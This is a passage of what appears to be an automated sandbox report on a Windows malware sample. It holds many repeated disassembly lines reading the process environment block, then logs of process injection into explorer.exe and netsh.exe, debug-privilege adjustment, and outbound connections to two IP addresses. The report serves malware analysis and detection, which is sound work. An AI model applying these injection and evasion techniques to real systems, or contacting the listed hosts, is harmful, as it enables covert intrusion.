                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BC730 mov eax, dword ptr fs:[00000030h]6_2_011BC730
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117C720 mov eax, dword ptr fs:[00000030h]6_2_0117C720
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117C720 mov eax, dword ptr fs:[00000030h]6_2_0117C720
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CE75D mov eax, dword ptr fs:[00000030h]6_2_011CE75D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01140750 mov eax, dword ptr fs:[00000030h]6_2_01140750
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182750 mov eax, dword ptr fs:[00000030h]6_2_01182750
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182750 mov eax, dword ptr fs:[00000030h]6_2_01182750
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C4755 mov eax, dword ptr fs:[00000030h]6_2_011C4755
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117674D mov esi, dword ptr fs:[00000030h]6_2_0117674D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117674D mov eax, dword ptr fs:[00000030h]6_2_0117674D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117674D mov eax, dword ptr fs:[00000030h]6_2_0117674D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01148770 mov eax, dword ptr fs:[00000030h]6_2_01148770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E678E mov eax, dword ptr fs:[00000030h]6_2_011E678E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011407AF mov eax, dword ptr fs:[00000030h]6_2_011407AF
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011F47A0 mov eax, dword ptr fs:[00000030h]6_2_011F47A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114C7C0 mov eax, dword ptr fs:[00000030h]6_2_0114C7C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C07C3 mov eax, dword ptr fs:[00000030h]6_2_011C07C3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011447FB mov eax, dword ptr fs:[00000030h]6_2_011447FB
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011447FB mov eax, dword ptr fs:[00000030h]6_2_011447FB
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011627ED mov eax, dword ptr fs:[00000030h]6_2_011627ED
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011627ED mov eax, dword ptr fs:[00000030h]6_2_011627ED
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011627ED mov eax, dword ptr fs:[00000030h]6_2_011627ED
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CE7E1 mov eax, dword ptr fs:[00000030h]6_2_011CE7E1
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182619 mov eax, dword ptr fs:[00000030h]6_2_01182619
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE609 mov eax, dword ptr fs:[00000030h]6_2_011BE609
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115260B mov eax, dword ptr fs:[00000030h]6_2_0115260B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115260B mov eax, dword ptr fs:[00000030h]6_2_0115260B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115260B mov eax, dword ptr fs:[00000030h]6_2_0115260B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115260B mov eax, dword ptr fs:[00000030h]6_2_0115260B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115260B mov eax, dword ptr fs:[00000030h]6_2_0115260B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115260B mov eax, dword ptr fs:[00000030h]6_2_0115260B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115260B mov eax, dword ptr fs:[00000030h]6_2_0115260B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115E627 mov eax, dword ptr fs:[00000030h]6_2_0115E627
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01176620 mov eax, dword ptr fs:[00000030h]6_2_01176620
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01178620 mov eax, dword ptr fs:[00000030h]6_2_01178620
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114262C mov eax, dword ptr fs:[00000030h]6_2_0114262C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120866E mov eax, dword ptr fs:[00000030h]6_2_0120866E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120866E mov eax, dword ptr fs:[00000030h]6_2_0120866E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115C640 mov eax, dword ptr fs:[00000030h]6_2_0115C640
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01172674 mov eax, dword ptr fs:[00000030h]6_2_01172674
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117A660 mov eax, dword ptr fs:[00000030h]6_2_0117A660
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117A660 mov eax, dword ptr fs:[00000030h]6_2_0117A660
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01144690 mov eax, dword ptr fs:[00000030h]6_2_01144690
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01144690 mov eax, dword ptr fs:[00000030h]6_2_01144690
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011766B0 mov eax, dword ptr fs:[00000030h]6_2_011766B0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117C6A6 mov eax, dword ptr fs:[00000030h]6_2_0117C6A6
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117A6C7 mov ebx, dword ptr fs:[00000030h]6_2_0117A6C7
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117A6C7 mov eax, dword ptr fs:[00000030h]6_2_0117A6C7
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE6F2 mov eax, dword ptr fs:[00000030h]6_2_011BE6F2
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE6F2 mov eax, dword ptr fs:[00000030h]6_2_011BE6F2
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE6F2 mov eax, dword ptr fs:[00000030h]6_2_011BE6F2
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE6F2 mov eax, dword ptr fs:[00000030h]6_2_011BE6F2
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C06F1 mov eax, dword ptr fs:[00000030h]6_2_011C06F1
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C06F1 mov eax, dword ptr fs:[00000030h]6_2_011C06F1
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01138918 mov eax, dword ptr fs:[00000030h]6_2_01138918
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01138918 mov eax, dword ptr fs:[00000030h]6_2_01138918
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CC912 mov eax, dword ptr fs:[00000030h]6_2_011CC912
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE908 mov eax, dword ptr fs:[00000030h]6_2_011BE908
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE908 mov eax, dword ptr fs:[00000030h]6_2_011BE908
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C892A mov eax, dword ptr fs:[00000030h]6_2_011C892A
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D892B mov eax, dword ptr fs:[00000030h]6_2_011D892B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C0946 mov eax, dword ptr fs:[00000030h]6_2_011C0946
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CC97C mov eax, dword ptr fs:[00000030h]6_2_011CC97C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01214940 mov eax, dword ptr fs:[00000030h]6_2_01214940
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E4978 mov eax, dword ptr fs:[00000030h]6_2_011E4978
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E4978 mov eax, dword ptr fs:[00000030h]6_2_011E4978
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01166962 mov eax, dword ptr fs:[00000030h]6_2_01166962
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01166962 mov eax, dword ptr fs:[00000030h]6_2_01166962
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01166962 mov eax, dword ptr fs:[00000030h]6_2_01166962
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0118096E mov eax, dword ptr fs:[00000030h]6_2_0118096E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0118096E mov edx, dword ptr fs:[00000030h]6_2_0118096E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0118096E mov eax, dword ptr fs:[00000030h]6_2_0118096E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C89B3 mov esi, dword ptr fs:[00000030h]6_2_011C89B3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C89B3 mov eax, dword ptr fs:[00000030h]6_2_011C89B3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C89B3 mov eax, dword ptr fs:[00000030h]6_2_011C89B3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011409AD mov eax, dword ptr fs:[00000030h]6_2_011409AD
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011409AD mov eax, dword ptr fs:[00000030h]6_2_011409AD
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114A9D0 mov eax, dword ptr fs:[00000030h]6_2_0114A9D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114A9D0 mov eax, dword ptr fs:[00000030h]6_2_0114A9D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114A9D0 mov eax, dword ptr fs:[00000030h]6_2_0114A9D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114A9D0 mov eax, dword ptr fs:[00000030h]6_2_0114A9D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114A9D0 mov eax, dword ptr fs:[00000030h]6_2_0114A9D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114A9D0 mov eax, dword ptr fs:[00000030h]6_2_0114A9D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011749D0 mov eax, dword ptr fs:[00000030h]6_2_011749D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D69C0 mov eax, dword ptr fs:[00000030h]6_2_011D69C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011729F9 mov eax, dword ptr fs:[00000030h]6_2_011729F9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011729F9 mov eax, dword ptr fs:[00000030h]6_2_011729F9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120A9D3 mov eax, dword ptr fs:[00000030h]6_2_0120A9D3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CE9E0 mov eax, dword ptr fs:[00000030h]6_2_011CE9E0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CC810 mov eax, dword ptr fs:[00000030h]6_2_011CC810
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01162835 mov eax, dword ptr fs:[00000030h]6_2_01162835
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01162835 mov eax, dword ptr fs:[00000030h]6_2_01162835
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01162835 mov eax, dword ptr fs:[00000030h]6_2_01162835
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01162835 mov ecx, dword ptr fs:[00000030h]6_2_01162835
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01162835 mov eax, dword ptr fs:[00000030h]6_2_01162835
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01162835 mov eax, dword ptr fs:[00000030h]6_2_01162835
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E483A mov eax, dword ptr fs:[00000030h]6_2_011E483A
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E483A mov eax, dword ptr fs:[00000030h]6_2_011E483A
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117A830 mov eax, dword ptr fs:[00000030h]6_2_0117A830
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01170854 mov eax, dword ptr fs:[00000030h]6_2_01170854
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01144859 mov eax, dword ptr fs:[00000030h]6_2_01144859
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01144859 mov eax, dword ptr fs:[00000030h]6_2_01144859
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01152840 mov ecx, dword ptr fs:[00000030h]6_2_01152840
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D6870 mov eax, dword ptr fs:[00000030h]6_2_011D6870
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D6870 mov eax, dword ptr fs:[00000030h]6_2_011D6870
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CE872 mov eax, dword ptr fs:[00000030h]6_2_011CE872
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CE872 mov eax, dword ptr fs:[00000030h]6_2_011CE872
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CC89D mov eax, dword ptr fs:[00000030h]6_2_011CC89D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01140887 mov eax, dword ptr fs:[00000030h]6_2_01140887
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120A8E4 mov eax, dword ptr fs:[00000030h]6_2_0120A8E4
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116E8C0 mov eax, dword ptr fs:[00000030h]6_2_0116E8C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_012108C0 mov eax, dword ptr fs:[00000030h]6_2_012108C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117C8F9 mov eax, dword ptr fs:[00000030h]6_2_0117C8F9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117C8F9 mov eax, dword ptr fs:[00000030h]6_2_0117C8F9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01208B28 mov eax, dword ptr fs:[00000030h]6_2_01208B28
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01208B28 mov eax, dword ptr fs:[00000030h]6_2_01208B28
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01214B00 mov eax, dword ptr fs:[00000030h]6_2_01214B00
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116EB20 mov eax, dword ptr fs:[00000030h]6_2_0116EB20
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116EB20 mov eax, dword ptr fs:[00000030h]6_2_0116EB20
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01138B50 mov eax, dword ptr fs:[00000030h]6_2_01138B50
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EEB50 mov eax, dword ptr fs:[00000030h]6_2_011EEB50
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011F4B4B mov eax, dword ptr fs:[00000030h]6_2_011F4B4B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011F4B4B mov eax, dword ptr fs:[00000030h]6_2_011F4B4B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E8B42 mov eax, dword ptr fs:[00000030h]6_2_011E8B42
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D6B40 mov eax, dword ptr fs:[00000030h]6_2_011D6B40
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D6B40 mov eax, dword ptr fs:[00000030h]6_2_011D6B40
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120AB40 mov eax, dword ptr fs:[00000030h]6_2_0120AB40
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0113CB7E mov eax, dword ptr fs:[00000030h]6_2_0113CB7E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01212B57 mov eax, dword ptr fs:[00000030h]6_2_01212B57
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01212B57 mov eax, dword ptr fs:[00000030h]6_2_01212B57
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01212B57 mov eax, dword ptr fs:[00000030h]6_2_01212B57
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01212B57 mov eax, dword ptr fs:[00000030h]6_2_01212B57
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150BBE mov eax, dword ptr fs:[00000030h]6_2_01150BBE
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150BBE mov eax, dword ptr fs:[00000030h]6_2_01150BBE
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011F4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01140BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01160BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01148BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011CCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011CCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01164A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01146A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01150A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011BCA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01178A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0114EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01214A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\netsh.exe | Code function: 8_2_01083A08 _wcsicmp,_wcsicmp,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,_wcsupr,GetProcessHeap,HeapFree
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\netsh.exe | Code function: 8_2_01089930 SetUnhandledExceptionFilter
                Source: C:\Windows\SysWOW64\netsh.exe | Code function: 8_2_010896E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\explorer.exe | Network Connect: 199.59.243.226 80
                Source: C:\Windows\explorer.exe | Network Connect: 162.244.93.3 80
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | NtClose: Indirect: 0xB0A56C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | NtQueueApcThread: Indirect: 0xB0A4F2
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Memory written: C:\Users\user\Desktop\hOe2JrpIAE.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Thread register set: target process: 1028
                Source: C:\Windows\SysWOW64\netsh.exe | Thread register set: target process: 1028
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Thread APC queued: target process: C:\Windows\explorer.exe
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1080000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Process created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Process created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"
